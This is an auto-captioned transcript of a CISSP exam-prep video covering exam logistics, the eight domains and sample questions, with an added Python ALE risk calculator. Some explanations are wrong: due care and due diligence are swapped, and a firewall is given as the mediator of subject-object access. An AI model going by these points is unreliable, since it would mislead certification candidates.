a management certification, so when you are in senior management this is the kind of certification that you would require for your management skills. Now, this is a non-technical or a semi-technical certification; here it's nothing about vulnerability assessment or penetration testing, you're not going to do anything hands-on, you are not expected to know hacking, or how to configure firewalls, antiviruses and whatnot. It's basically something where, over a period of years of experience, you have evolved a certain understanding of how security policies should be constructed, how they should be implemented, and how security affects an organization. So here you are responsible for creating an overall security policy for an organization, to help maintain the security posture of the organization.

Now, as far as the certification is concerned, it has a validity of three years, after which you don't have to give the exam again; however, during these three years you have to earn a certain number of points, known as continuing education points. (ISC)² allows you to generate points by attending lectures or webinars, by publishing white papers, or by providing trainings. Obviously all of these should be authorized, and you should have validation from an authorized party that you have done this activity; once it is verified you will be awarded certain points. Once you have collected a sufficient number of points, you will retain your certification beyond three years.

The passing rate of this exam is less than 50 percent. It's not about how much you require to score; what this basically tells you is the number of people who actually clear the exam in the first attempt. Now let's not get disheartened because of this. Essentially the exam is quite tough; it's known as a mile-wide and inch-deep exam, which means you need to know just about everything and anything that is there to be known in information security, and that's something that we are going to discuss when we go into the eight domains of CISSP. What happens is there are a lot of people who are not actually prepared for the exam, who think they are prepared, attempt the exam, and sadly fail in their first attempt. Some people just misjudge the exam and are not prepared for it. So the fact that I'm trying to put across is: be very well prepared. I have seen people who study for months together, attempt a lot of questions, ensure that their knowledge is up to the mark, and only then do they attempt the exam.

Anybody can register for the exam, to be honest, and clear the exam as well; however, to get certified there are two different avenues. If you have experience of at least five years in two of the domains that are in the CISSP course, you get certified. So even if you clear the exam, there is a validation process that happens after the exam where you have to submit documentation to prove to (ISC)² that you have that level of experience, and once it is proven and validated you get certified as a CISSP. If you do not have that five years of experience, you get certified as an Associate of (ISC)² for CISSP, and they give you six years during which you can achieve the level of experience, prove it to them, and then get certified as a CISSP. So you can see the stringent levels that are applied for this certification. The validation is basically documentation and proof that you have to submit and which is verified. So even after you clear the exam, to get validated and certified it can take up to five to six weeks for (ISC)² to validate and provide you with the certification.

With that, let's go and see the exam. Let's have an overview of what the exam is all about. The governing body is (ISC)², that's

what we have been referring to. The professional experience: at least a four-year college degree, or additional credentials from (ISC)²'s approved list, will satisfy one year of the required experience, and five years of paid full-time work experience in two or more domains. Like I said, anybody can give the exam: register for it, attempt it, and once you clear it, that's where the criteria of your work experience come into the picture. You prove five years of experience, probably by a letter from your organization, from your HR, saying you have this kind of experience that is relevant to the certification; the issuer will validate it and you get the certification. If you don't have that experience you get the Associate of (ISC)², and then you get six years to attain that level of experience, after which you can get certified.

The exam fees were 699 dollars, so it's an expensive exam, a single attempt for each voucher; so if you fail, that's another 700 for the second attempt. The fact being, if you fail for the first time you cannot attempt the exam for the next 30 days; if you fail for the second time you cannot attempt the exam again for the next 60 days; and if you fail for the third time you cannot attempt the exam for another 90 days. So there's a cooling-off period after each attempt. So I would suggest: study hard, go for the first attempt, clear it and nail it. The maintenance fees for your certification are again 85 US dollars for three years.

The exam length is three hours and the questions could vary from 100 to 150, 150 being the maximum number of questions that can be asked in that exam. You can clear the exam well before 150 questions, so be prepared for that as well. But imagine when you're walking into that exam: bear in mind that you will be asked 150 questions and you have to time those in three hours, 180 minutes, so if you do the math, not much time for every question; it's just a minute and a half or less for each question. And the questions could be very descriptive, could be confusing, so you have to have your mental faculties really strong during the exam. The passing score is 700 out of a possible 1000 points. The exam language is English. Testing centers: there are (ISC)² authorized centers where you need to book that exam. There's a huge process that you have to follow wherever you go for the exam itself. So once you have registered on the (ISC)² portal and you purchase the voucher, they will give you a list of centers in your vicinity that you can look into; they'll give you a calendar with the possible dates that you can attempt the exam on. Select the center, select the date, reach the center at least half an hour before the scheduled time. There is a verification, so you have to carry your identification, a government-issued document, either a passport or a driver's license, where you have to prove that you are who you say you are, and once the verification is done, only then do you get to attempt the exam.

The question formats are of three types: multiple choice, drag and drop, and hotspots. Multiple

choice is the format that we are going to look at when we look at sample questions; it's the same: they give you a question, they give you four options, and either one or more options need to be chosen; they will specify if there is more than one answer to that particular question. Drag and drop is more like match the following: there will be a column A and a column B, and they'll ask you a question and say, okay, column A gives you the options, drag and drop whichever correct answer from column A to column B and then submit the answer. If the answer is correct you get awarded the points; otherwise there is no negative marking. The third is a hotspot. A hotspot question is basically a diagram, let's say an architectural diagram, that will be presented to you, and they will ask you to pinpoint a certain aspect within that diagram. For example, they may give you an architectural overview of a network, of how it has been established, and they will ask you, for a network-based firewall, which is the most likely area where you would want the firewall to be placed. So you don't need to know how to configure the firewall, but from an architectural perspective you need to know where that firewall needs to be placed for it to be the most effective for the given scenario in the question.

These are the domains that are asked, so you can see it basically covers anything and everything that is there in information security. It starts off with security and risk management, which weighs 15 percent of the questions in your exam; so if your exam is 115 questions, 15 percent would be around 20 to 22 odd questions, and risk management is one of the most important topics for these kinds of certifications. Then asset security, which covers 10 percent of your questions, so that's around 15 questions. Security architecture and engineering: this is where your infrastructure knowledge, your security architecture, your enterprise architecture, all those come into the picture; there are a lot of theoretical models that you need to study in domain 3, and that covers 13 percent of your exam. Communications and network security: this is the most technical topic within all these eight topics; this is where you talk about networks, you discuss protocols like TCP and UDP, you discuss different attacks, man-in-the-middle attacks, DoS attacks, and this basically has 14 percent of the weightage. Then you have identity and access management, which basically talks about users, subjects and objects, the subject being the user and the object being the resource, and a relationship between these is created where people are authorized for some activity, authenticated and only then allowed, and also held accountable for whatever activity they have done. Then you go into security assessment and testing, so vulnerability assessments, penetration tests, software testing, SAST and DAST a little bit; all those will be covered

In domain number six which has twelve percent weightage then security operations so security operation center or the stock day-to-day management of incidents so your incident management would come into the picture problem management change management all of those things would come under domain 7 as security operations which has 13 of

Weightage and then finally software development security now you don’t need to know development or you don’t need to know any programming there are no program based questions they’re not going to ask you how to code they’re going to ask you how to manage a software development life cycle or a

Secure software development life cycle so this is where your waterfall models modified waterfall models spiral agile devops devsecops all come into the picture and this has 10 percent of weightage now it is near about impossible for everyone or anyone to get experience across all these domains so

You will have your strong points and you will have your weak points the task is to identify where you’re good at understand those things make the maximum amount of it then identify your weak points and start developing on those if you are able to look at it from a

Theoretical perspective however if you can get an internship or if you can get a you can say just an insight of how it works in the practical world it would be very helpful now that being said as far as cissp exam is concerned it involves a very ideal world the real world actually

Doesn’t come into the question because the real world will have a lot of business logic to it by business logic what do we mean every organization will modify their projects based on the expertise that they have based on the talent that they have and based on the people

Or the hierarchy of the organization that has been established so it can be customized to each and every organization since an exam cannot deal with these kind of customizations we deal with an ideal world so for the cissp exam we assume that we have all the resources we have all the people

That are required we have an hierarchy in the training which is given out where we have rules for each and every person and job titles for each and every person right so when we go through the training it is very essential that we understand what these job roles are what their

Responsibilities are so that when we get those questions we can identify which person is going to attempt what in the real world things are very different we piggyback we take on multiple responsibilities and that is something that cissp doesn’t adhere to so you have to be very careful identify the job

Roles identify the responsibilities have that map the hierarchical map created very well and then try to implement the ideal world scenario from the cisp standards to see what is going to happen that being said let’s move on let’s discuss the domains now these domains we’ve already seen what we can do is we

Are going to move on to the sample questions for each and every domain once we reach the domain we’ll see what the topics in that domain are we’ll look at the sample questions then we’ll look and go to the next domain see the topics in that domain and then look at the sample

Questions as well so what to study and those sample questions revolving them so looking at the first module offers domain security and risk management now this is one of the largest domains that could be debatable for me i would say the largest domain could be domain number three security architecture and engineering uh

Could also be domain number four because it is quite technical communications and network security and could also be security operations because that’s incident management change management problem management altogether but each domain is very important from the exam’s perspective if you’re thinking about keeping a domain for options forget it

That’s not the right way to address the exam let’s start off with the first one security and risk management this domain teaches you all about information systems management and this talks about risks and everything so what we are going to do is we are just going to go

To the official document from iac square where these domains and their topics are given so that’s the exam outline from cis from ic square towards cissp this is the latest document that is there available online you can see the url in my browser address bar and these are the

Eight domains there’s the exam three hours number of questions 100 to 150 multiple choice and advanced innovative questions that’s where the drag and drop and the hotspot comes into the picture though based on experience i can tell you that 90 of your questions will be multiple

Choice 10 would either be drag and drop and hotspots passing grade is 700 out of 1000 points exam language availability is english those who want to attempt in other languages it is available but then the exam is six hours and the questions are 250. so that’s your option depending

On which language you’re most comfortable with we are going to go with english that’s the language options coming in cissp linear exam 6 hours 250 questions everything else remains the same these are the languages supported french german brazilian portuguese spanish japanese simplified chinese and korean the weightage i guess remains the

Same and that’s the first domain security and risk management so what does it pertain to understand and apply concepts of cia confidentiality integrity and availability in the first video we have gone through uh all the eight domains at quite some length we have discussed what cia is all about and

How their interrelationship is so if you want a deep dive or rather a deeper dive than what we are doing for the domains go back to the first video uh look into that and then you can come back to this video again so evaluate and apply security governance principles so we

Have to understand what governance is now governance is basically having a overlying architectural security policy that can be integrated with an enterprise architecture and thus having your security policy in alignment with the business goals and objectives security should never become a hindrance for a business security should always

Become a supporting feature which should allow the business to be executed in a secure manner so as a security expert our first goal is to identify what the business does what the business processes are what is the business trying to achieve and then we try to create a security policy revolving these

To enhance the business functionality uh in a overall picture so you’re looking at organizational processes acquisitions divestitures acquisition is when let’s say scenarios where you have trying to create a security governance policy now the business is trying to change because they’re trying to acquire another organization and merge it within

This organization and now your security policy should encompass not only your organization but the newly acquired organization let’s say the next five years a business decides that the newly acquired organization is no longer profitable and they want to sell it off and now that’s where the diverse share

Comes into the picture you are now trying to separate the entity that you have just integrated in your security policy and you are now trying to separate it with confidentiality integrity and availability of the company’s data intact without affecting the organization at any point in time understand the fact that security is not

Only about hacking or getting hacked it’s about being secure at all points in time during business uh continuity and business let’s say business as usual kind of activities so that’s where your security control frameworks would come in you’re going to talk about iso 27001 we are going to talk about cobit

Pci dss nist 800 series and so on so forth and the most two important statements or terms in the cssp is due care and due diligence due care is you doing your own research to identify what security controls need to be implemented or what kind of governance needs to be

Implemented and due diligence is you yourself spending that much time money effort into implementing those decisions that you have come come across during the due care thus enhancing the security functions of an organization so when we talk about business requirements for a business to be effective at the same

Time it needs to be legal it needs to be compliant to regulations and laws and to the contracts that have been created by the organization so as far as the concept goes when we say that security needs to be in alignment with the business requirements the business requirements imply that the business is

Legal is compliant to regulations is compliant to their contractual obligations and is following standards that have been prescribed to them so all of them come together and that’s where your security mapping comes into the picture we are looking at legal and regulatory issues like cyber crimes and data breaches licensing and intellectual

Property requirements and so on so forth and it will also include isis squares code of professional ethics now this is a document apart from the eight domains that we have talked about thus what does this document talk about this is the prescription from iic square of professional ethics for a cyber security

Professional expect around four to five questions from professional ethics as well so not only is this a document that you need to read and adhere to you will be questioned upon this in your exam and these are easy points to score professional ethics something that is ethical something that is not against

The law so it’s kind of quite easy but the questions can be confusing so you need to go through the entire document really well and then your organization will have its own code of ethics however if you look at the hierarchy ic squares ethics comes first so your organizational ethics should not be

Contradictory to ic squares ethics in the first place then develop document and implement security policies standards procedures and guidelines identify analyze and prioritize business continuity requirements so here that’s where your risk assessment comes into the picture if you’re looking at a particular risk that means a particular vulnerability has been identified you

Want to see the likelihood of that vulnerability being exploited and then the business impact analysis that it may have based on which you would then create a plan to mitigate that particular risk by having a business continuity or a disaster recovery plan coming into the picture

Now this is as far as this domain is concerned: you're calculating the risk; it doesn't actually tell you how to mitigate that risk. That's when you go into the next, future domains and discuss those technicalities. So you can see: contribute and enforce personnel security policies. Now the thing about CISSP is physical security also comes into the picture. Why? Because if hardware is not well protected there would be physical attacks, social engineering attacks that could be created, which would lead to data leakage as well, and the first and the foremost, most valuable asset of an organization is always human personnel. So CISSP would also deal with people protection in the first place, for example protecting people against social engineering attacks, making them aware about these attacks. If there are natural calamities you have to plan for them during your disaster recovery and business continuity plan and ensure that people are safeguarded. Not only that, you have to tie these things up with identity and access management, for example account creation, account management, onboarding of employees, off-boarding, termination of employees, third-party contractors, consultants that you're going to hire which are not employees but third parties coming in to your organization providing intelligence, and so on and so forth. So all of those come into the picture as well, and then that's where your risk management concepts come in; it gives you a very good overview of how to identify those risks and so on and so forth. Now this is what the first domain is all about. It itself is very huge, and as we go ahead we can tie this domain to the rest of the domains. For more deeper analysis go to the first video and then we can come back to this.

So let's start with the questions, the first question. Now these are very short one-liner questions; your exams would be more descriptive. To be very honest with you, if you go online, no matter what practice questions that you try, or whatever dumps if you can find those, you will find none of them will be ever any close to the actual exam questions. You will find a lot of sites online that sell you CISSP dumps with 100 percent guarantee for you to clear. Don't fall for that; it's just a money-making scam. Those questions will be similar questions, something that will give you an insight about what the exam is going to be, but when you attempt the exam you will find out that those questions are very different from the actual exam itself.

Coming back to the questions: the primary goal of a security awareness program is? Now what is the security awareness program and why is it created? The primary goal, so is it to provide a platform for disclosing exposure and risk analysis; to make everyone aware of potential risk and exposure; to provide accurate risk and exposure results; or a way of communicating security procedures? Now the answer to this is to make everyone aware of potential risk and exposure. Doesn't mean that you're trying to make everybody an ethical hacker; what you're trying to do is, in your organization, you are trying to create a security awareness program which allows your employees to know what kind of policies exist in your company, what rules need to be followed, what are the procedures that need to be followed for them to safeguard themselves and company assets as well, and ensure that data leakage and data loss are kept at a minimum. So you're basically trying to make everyone aware of the risks that they may have, for example social engineering, not clicking on links, not going to unwanted sites, and so on and so forth.

Question two: a contingency plan should address which of the following: potential risks, residual risks, or identified risks? Now what is a potential risk? A potential risk is something that you may foresee in the future, something that may exist. A residual risk, we will come to that. What is an identified risk? A risk that has been identified is known to the organization and the organization is aware of it. So potential is something that may come into the future; identified is something that exists right now. A residual risk, on the other hand, is a risk that was identified earlier on, mitigated, but after mitigation there is still an amount of residual risk that exists. So these terminologies need to be understood really well. Let me give you an example of a residual risk. So let's say there's a SQL injection, a flaw that has been identified in an application, and that's now an identified risk. Now you've got two options in front of you: go through a software development life cycle again, recode that part of the application to mitigate the risk, or else have a security control like a firewall, a web application firewall, watching that risk. Now the ideal scenario would be that you go through the development process again, but that is going to take time, so you put in a compensatory control, that is a web application firewall, in the meanwhile to mitigate that risk, and then have the recoding done and then later on resolve the risk altogether. So when we put in the firewall to mitigate the risk temporarily, is the risk actually addressed? No, there is still a possibility of a SQL injection attack happening, but we just have it mitigated to a certain extent because there is a firewall watching it. So that means that there is still a residual risk, a risk that is remaining even after me implementing the security protocol or the security control. That is what a residual risk is: something that remains even after I put in a security control, which can be taken care of later on or can be accepted and just moved upon. So coming back to the question: a contingency plan should address which of the following, either a potential risk, a residual risk, an identified risk, or all of the above, and the correct answer to that is a residual risk. What is a contingency plan? A contingency plan is: I still have a security control, but something may go wrong, and for that I want a secondary control to be in place to ensure that if the first control fails, the second control would still be able to identify that and stop the security incident happening. So we are looking at residual risks and then having a contingency plan to manage those residual risks.

Question three: when the cost of the countermeasures outweighs the cost of the risk, the best way to handle the risk is to reject the risk, transfer the risk, accept the risk, or reduce the risk? Now there are four ways a risk can be managed, right: accept the risk, avoid the risk, transfer the risk, or mitigate the risk, right? Rejecting the risk is not an option. But what is the question? Cost of a countermeasure outweighs the cost of the risk. So what is the cost of a risk? The cost of a risk is basically the impact that the organization is going to face in a monetary manner if the risk is realized. To mitigate that we have a countermeasure in place. So if in the previous example I have identified a SQL injection attack and the countermeasure to that is me implementing a security control, a web application firewall, to mitigate that risk; however, if somebody executes that risk, somebody does a SQL injection attack, the loss that I'm facing is only a hundred dollars per incident, and the maximum incidents that can happen in a year are 10, so 10 into 100 is 1,000 per annum is what that risk is going to cost me. For me to implement a web application firewall, on an annual level it is going to cost me, let's say, fifteen thousand dollars in licenses, management, salaries, and all of those things, which means that I'm facing a loss of one thousand dollars but I'm spending fifteen thousand dollars to prevent that loss. I'd rather have the thousand dollar loss than spend fifteen thousand dollars, right? So in this scenario the cost of the countermeasure is outweighing the cost of the risk by fourteen thousand dollars. So in this scenario which is the best way I would do it? Either reject the risk, which is never an option because you cannot reject the risk; transfer the risk, what is transferring your risk? Transferring it to a third party by purchasing insurance, for example, right? So if I purchase insurance saying if this gets compromised the insurance company is going to make the payments, I'm safeguarded; or accept the risk; or reduce the risk. So in this scenario accepting the risk is basically accepting the risk the way it is, moving on, because there is nothing that you can do about the risk and you are willing to accept the risk rather than spend money on it, and reduce the risk is mitigating the risk by implementing the firewall and spending that money and then incurring those losses. So the best answer out of this is accepting the risk. Why can't I transfer the risk? Because there is no such insurance, in the given example, where I can get that kind of an insurance policy. Reducing the risk would entail me spending that fifteen thousand dollars to mitigate the thousand dollar risk, thus incurring a fourteen thousand dollar loss, which is against the business logic; a business needs to make money, not spend money. And that's the fourth option that's left, that's accepting the risk, which means we are not going to implement the firewall because it is outweighing the cost of the risk; we are just willing to accept the risk itself and move on. That's the first domain.

Moving on to the second, which is asset security; it consists of topics about physical requirements of information security. Let's go back to the document in hand.
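The cost-versus-risk comparison behind question three above, worked as an added example (this is not code from the Simplilearn video): it takes the single loss expectancy, the yearly rate of occurrence and the countermeasure's annual cost, computes the annualized loss expectancy, and reports whether reducing or accepting the risk is the cheaper response. The function names, the `residual_aro` parameter that models the residual risk a web application firewall leaves behind, and the second, lower-cost scenario are my own constructed assumptions.

```python
"""Quantitative risk cost-benefit check (added example; not from the video).

Figures taken from the domain-one question above:
  SLE  single loss expectancy        = $100 per SQL injection incident
  ARO  annualized rate of occurrence = 10 incidents per year
  ALE  annualized loss expectancy    = SLE x ARO = $1,000 per year
  annual cost of the web application firewall = $15,000
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskDecision:
    ale_before: float        # yearly expected loss with no countermeasure
    ale_after: float         # yearly expected loss that remains (residual risk)
    control_cost: float      # yearly cost of the countermeasure
    safeguard_value: float   # (ale_before - ale_after) - control_cost
    response: str            # "reduce" (implement the control) or "accept"


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO: what the risk costs per year if nothing is done."""
    if sle < 0 or aro < 0:
        raise ValueError("SLE and ARO must be non-negative")
    return sle * aro


def evaluate_countermeasure(sle: float, aro: float, control_cost: float,
                            residual_aro: float = 0.0) -> RiskDecision:
    """Compare the countermeasure's annual cost with the loss it avoids.

    residual_aro is the incident rate expected *with* the control in place
    (an assumption of this example). The default 0.0 matches the question's
    reading that the firewall prevents the loss outright; a positive value
    models the residual risk the video describes, where a WAF only mitigates
    SQL injection "to a certain extent".
    """
    if residual_aro > aro:
        raise ValueError("a control cannot make incidents more frequent")
    ale_before = annualized_loss_expectancy(sle, aro)
    ale_after = annualized_loss_expectancy(sle, residual_aro)
    value = (ale_before - ale_after) - control_cost
    # Rejecting a risk is never an option; transfer (insurance) would be
    # weighed the same way if a premium were on the table.
    response = "reduce" if value > 0 else "accept"
    return RiskDecision(ale_before, ale_after, control_cost, value, response)


if __name__ == "__main__":
    # The video's numbers: $100 SLE, 10 incidents/year, $15,000 WAF per year.
    d = evaluate_countermeasure(sle=100, aro=10, control_cost=15_000)
    print(f"ALE ${d.ale_before:,.0f}, safeguard value ${d.safeguard_value:,.0f}"
          f" -> {d.response} the risk")
    # Constructed contrast (not from the video): a $200/year control that cuts
    # the rate to 2 incidents/year is worth implementing.
    d2 = evaluate_countermeasure(sle=100, aro=10, control_cost=200, residual_aro=2)
    print(f"ALE ${d2.ale_before:,.0f}, residual ${d2.ale_after:,.0f},"
          f" safeguard value ${d2.safeguard_value:,.0f} -> {d2.response} the risk")
```

The safeguard value is the net-benefit figure the exam expects you to reason with; on the video's numbers it comes out at minus fourteen thousand dollars, which is exactly why the speaker accepts the risk rather than reducing it.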

Moving on to domain two, asset security, we talk about assets. Assets could be, now okay, let's get into the definition of what an asset is. An asset could be anything that has a monetary value associated with it from the organization's perspective. It could be data, it could be virtual assets, it could be physical assets, it could be anything and everything. It could be a license, right? You purchase an operating system; the operating system comes with a virtual license that installs on your machine, or is associated with an email address. Even that license has a value, so even that license will become an asset. So the basic definition is anything and everything that is owned by the organization and has a monetary value associated with it, right? Thus we talk about asset classification as well. Asset classification could be data; within data itself there would be sub-classifications like confidential data, non-confidential data, public data, and so on and so forth; physical assets, virtual assets, networking assets, anything and everything that you can come across would be classified here. Determine and maintain information and asset ownership: so your asset management program comes into the picture, and when you say asset ownership, the organization owns the assets as they are; however, roles and responsibilities that you have created in the organization will ensure that some assets are virtually owned by somebody. That means that they are responsible for the well-being of that asset, so you have to identify who. For example, HR. Now HR is a function, human resources, but they also need IT assets, for example a payroll, which will institute a payroll software, a database, right, a web application server if you will, and all of these assets are now owned by the HR department. So there are hundreds of people in HR, so who exactly owns this? That's where we identify the owner of that particular asset, saying you are responsible for the well-being of these assets, you belong to this department. So normally the head of that department would be the owner of those assets and would determine what kind of access controls, what kind of maintenance, management, security mechanisms are required. Then we talk about protecting privacy, so data owners, data processors, remnants, collection limitations, determining and ensuring appropriate asset retention. So let's say data, right; even if I have data, how long do I retain data? If you go into privacy acts of organizations, or of countries rather, so GDPR for the European Union: GDPR basically states that you will only retain personally identifiable information for as long as the organization requires it. The moment you have no reason to have that data with you, you're going to delete that data, which means automatically it says you're going to retain that data till it makes business sense; once you figure out it is not required, you're going to delete it in a secure manner which is not recoverable to unwanted parties. So you have to determine those asset retention periods; we have to understand what those retention periods are. So for your physical assets there will be a life of the asset that is associated with it, and once the life of that asset is over, even if the asset is working properly, you have to discard that asset and you have to replace it. You have to do this with security in mind. Then the security controls for all of these things: understanding data states. Data states could be in three different aspects: data in motion, data at rest, and data in use. How are you going to secure data during all these three stages? What are the protection methods that you're going to utilize? Then establishing information asset handling requirements. So that's what domain 2 is all about.

Let's look at the questions. So the first question in domain 2: which of the following is responsible for setting user clearances to computer-based information? Is it operators, data owners, security administrators, or data custodians? Understand the question: who is responsible for setting your user clearances to computer-based information, and the correct answer to that is security administrators. They are responsible for setting the user clearances; who are going to be responsible for allowing the user clearances, that's going to be data owners. What is generally concerned with personnel security: management controls, operational controls, technical controls, or human resource controls? Now what is personnel security? Personnel security is people-centric security; you're looking at people and you're ensuring that their security comes into the picture. Technical controls can be used for data assets or physical assets like information technology, but technical controls may not be that relevant for a human; a firewall is not going to help anyone any which way. Management controls are administrative controls; that means a policy that will help you implement controls. But for personnel security it is the operational controls that are going to be associated with it. Which of the following factors determines the frequency of information security audits in any given environment? So the age-old question: for you to remain secure, how often do you want to conduct a security audit to verify your vulnerabilities, your penetration test, to verify your security controls are working properly? So would it be dependent upon asset value, the risk-based approach, management discretion, or level of realized threats? And here the answer to that question is risk. The moment a risk is identified, for example, at what various stages would a security audit be triggered for an individual asset as well, and that can be tied down to incident management, change management, and problem management. So if there is an incident, a security incident with a database server where there has been an attack on that server, I probably want the security audit done on that server to identify vulnerabilities, flaws, and then to mitigate those risks. Similarly, if there is a change that has been going on in your organization, you first want to go into a risk assessment strategy and then you want to look at security audits based on the risk that you have identified, right? So a security audit is not only periodic, based on compliances or regulations, but it also can be integrated really well in your incident management, problem management, and change management scenarios. That's domain number two.

All right, let's talk about domain three, security architecture and engineering. Now this is where you tie up security architecture and enterprise architecture. If you look at the first domain we have talked about risk assessments, we have talked about confidentiality, integrity, and availability, and then we have moved on to the second domain where we talked about asset security; so that's where we talked about data, data classification, asset classification. Now it starts off with the enterprise-level architecture, so something like TOGAF. What is enterprise-level architecture? It's basically a data center architect and a network architect trying to create data flows, deciding how communications are going to happen between various devices. They're going to try to do network segmentation for web application servers, database servers, look at network isolations, network access control lists, and may even decide how firewalls and where firewalls would be required. Once that architecture is created, we need to secure that architecture to ensure that whatever data communications are happening within that framework, they are secured in a manner where all the risks that the organization may be exposed to are either managed, mitigated, accepted, transferred, whichever the way it is, right? So here you start off with physical security, you start off with trusted platform modules. So looking at the outline, this is where it starts off with implement and manage engineering processes using secure design principles. So this domain will talk about using TOGAF and then using the Zachman framework to interact with all the data owners, all the asset owners, querying them about the security of the assets, the requirements, because it is not the security architect who determines how secure the device will be; it is the asset owner who determines the requirement of security. For example, continuing with the HR example that we were talking about earlier, if the head of the HR department is responsible for the database for the payroll application, it is that person who would be determining the security levels. So based on the security architecture, let's say the Zachman framework, we would create a questionnaire that needs to be filled out by the asset owner, the head of the HR department, and would be supplied to us, the security heads, and then we would try to create a security profile based on their requirements. So if the HR department head comes back to me and says that they require to be adhering to a particular standard, or they want X kind of security, it is us who will validate that requirement and it is us who will execute it and protect that asset based on their requirements. So this is where your security architecture meets enterprise architecture by using various frameworks. This domain will introduce you to not only the Zachman framework; it will again take you to a trusted platform module, it will talk about ITSEC, TCSEC, Common Criteria, and so on and so forth. So this is again a very extensive module. Some people struggle with it because it is largely a theoretical module, and some people would struggle with the concept of what is a security architecture and an enterprise architecture. It is very important to understand the differences between them. For example, TOGAF is an enterprise architecture where a data center architect would deploy and streamline those devices, on which a layer of security architecture such as ISO 27001 would be implemented to enhance the security and ensure that the infrastructure remains protected at all points in time. This module will also deal with managing vulnerabilities on assets, applications, web-based systems, mobile systems, and embedded devices. So this is where your engineering comes into the picture. By this module we mean, when we are deploying infrastructure, we need to engineer it with security in mind; we need to architect in such a way that security enhances the business needs, business requirements, and they are executed in a secure manner.

Let's look at a few questions based on domain three. Question one: when a computer uses more than one CPU in parallel to execute instructions, it is known as multiprocessing, multitasking, multithreading, or parallel running? Now here we need to understand what is the difference between multitasking, multithreading, multiprocessing, and parallel running. Now it would be very difficult to explain all these processes in this video, so here we are talking about executing instructions; that's multiprocessing. Multitasking is performing multiple tasks at the same time; multithreading is where processors create their multiple threads to manage certain functions. Here, when we are parallelly executing instructions, it is known as multiprocessing. Question two: who mediates all access relationships between subjects and objects of a system? Now what is a subject, what is an object, and what are access relationships? So access relationships would be your permissions that you have created. Now what are permissions? Permissions would be something that a person is authorized to do. So if you look at the CIA which we discussed in module one, confidentiality, integrity, and availability, how do we keep data confidential? By only allowing authorized users access to that data. What are authorized users? Authorized users are people who have been identified and are allowed access to certain

Resources how do we do that by having an identity and access management platform in place which will be discussed later in the next domain but confidentiality would include i triple a standards i triple aaa starts with identification authentication authorization and accountability identification is identifying the person who they are

Authentication is verifying that they are actually who they claim to be authorization is where the access relationships come into the picture where we once we have authenticated a user we are creating a matrix which allows them access to certain resources to a certain extent some may have read

Only access some may have modify access some may have delete access etc so in this scenario we are talking about access relationships between subjects and objects of a system and who mediates that now when you say reference kernel information flow model or security kernel of firewall in this particular

Scenario for this particular question based on the options that are available we are talking about a rule-based access control system which means that we have created rules of what is allowed into a network and how what is not allowed within the network this can be controlled by using a firewall so this

Can be controlled by using a firewall question three which of the following is not a spam blocking architecture now what is spam and how are you going to block it it can be at the client side it can be on the email server by a way of identified spam filters could be

Application based in this scenario mail blocking services basically you creating a blacklist which will block emails from certain addresses or from certain things so this is not a spam blocking architecture it’s basically a blacklist where you’re blocking emails but spam blocking architecture could either be at

The email server based could be at the client side where they’re using let’s say microsoft outlook express and they’ve created rules within it or could be on an application where you have configured rules over there moving on to domain four now this is where the technicalities come into the picture

Communication and network security the network security domain covers topics focused on protecting the network of an organization so communications tcp channels udp channels the tcp so you come across the osi layer you map the osi layer with the tcp ip layer and see how a data fragment packet is created

Looking at domain four we are talking about the osi layer open systems interconnection compared to the tcp ip or the transmission control protocol over internet protocol models you’re talking about internet protocol itself we are talking about converged protocol software defined networks wireless networks then we are talking about

Securing network components so we talk about firewalls types of firewalls endpoint security network access control devices and we look at them over virtualized networks wipe multimedia looking talked about talking about remote access data communications right so all of this is concerned within domain four now osi and tcp itself could

Take hours for people to understand to people to comprehend how computers work now these are theoretical models and we need to create an understanding of how theory merges with the practical world let’s look at a few questions what is the purpose of using a vpn now the sense

Over here is what is a vpn or a virtual private network how is it created what technologies can be utilized within it what encryption mechanisms can be utilized and why are we creating that encryption mechanism in the first place so is it to secure remote access into a network securely connect two networks

Together secure data tunnels within the network or all of the above so here with a vpn we are basically trying to do everything we are trying to create encrypted tunnel between two systems or two networks where data can be transmitted in a secure manner where man in the middle attacks or network based

Attacks would be mitigated a vpn can secure packets from data link layer onwards to the application layer question two which of the following characteristics are not included in the tcp protocol now what is a tcp protocol tcp is a connection oriented protocol it is a reliable protocol that is utilized

To communicate between our servers in a reliable manner so a tcp protocol being a connection oriented protocol which is reliable in nature so which of the following characteristics are not included connection less protocol that is the udp protocols have this is not included in the tcp protocol question three which

If you remember the previous slide would be the udp protocol a udp protocol is a protocol that is used for its speed rather than reliability when it is real-time processing that is required we use udp so most of our voip communications would happen over udp protocols okay so looking at domain

Number five domain five talks about identity and access management so this ties up with your asset management your risk management because if we go back to the confidentiality integrity and availability aspect of it identity and access management is basically allowing authorized users access to resources by authenticating them and also holding

Them accountable so this becomes the sense of how you’re going to allow people to access the resources that you have in your organization let’s look at what this domain covers it will talk about physical and logical access to assets so servers need to be protected by putting them in a secure server room

Does this restricting access to them and allowing access only to those few people who require access to them once we have secured those servers uh this is where we talk about physical security whereas we got a secure room we are going to monitor that room we will have access

Controls we will have guards monitoring who is getting access or who’s trying to get access to that environment and then you’re going to create logical access as well where we let’s say have swipe cards on the door locks so anyone with logical swipe card can access that particular

Facility you’re also looking at managing identification and authentication of people devices and services so here we are going to talk about authentication mechanisms single authentication multi-factor authentication we are talking about single sign-ons we will talk about federated identity management modules we’ll look at casbi or cloud access service brokers we’ll talk about

Session management from applications and so on so forth we will also talk about third party identity as a service provider where we integrate those identities like open id into our organization and we validate people based on the identity that they have created with those organizations then we talk about access control list which

Would be role based access controls mandatory access controls discretionary access controls attribute-based access controls rule-based access controls and then there are a lot of theoretical models that are integrated in this module which talk about lattice-based approach which will talk about other theoretical models which will help you align how identity and access management

Is implemented in an organization so at this point in time we will also be looking at a life cycle of how identities are managed for example onboarding of people deboling of people termination of employees employees as they move within the organization by getting promotions demotions or changing

Departments and assuming a new role so here we talk about how we can provision an identity how we can de-provision an identity how it is to be managed we are going to create a relationship between the creator of this identity and the approver who is going to be a manager so

Even if somebody is allowed to create an identity they will only create it if they have an approval from appropriate manager so let’s look at questions from domain number five the first one which of the following is the most important factor while selecting a biometric system for securing critical assets now

Here the domain talks about the types of authentication mechanisms there are five types essentially three basic types which talk about something that you know which is a password something that you have a swipe card someone that you are a biometric somewhere that you are location based and something that you do

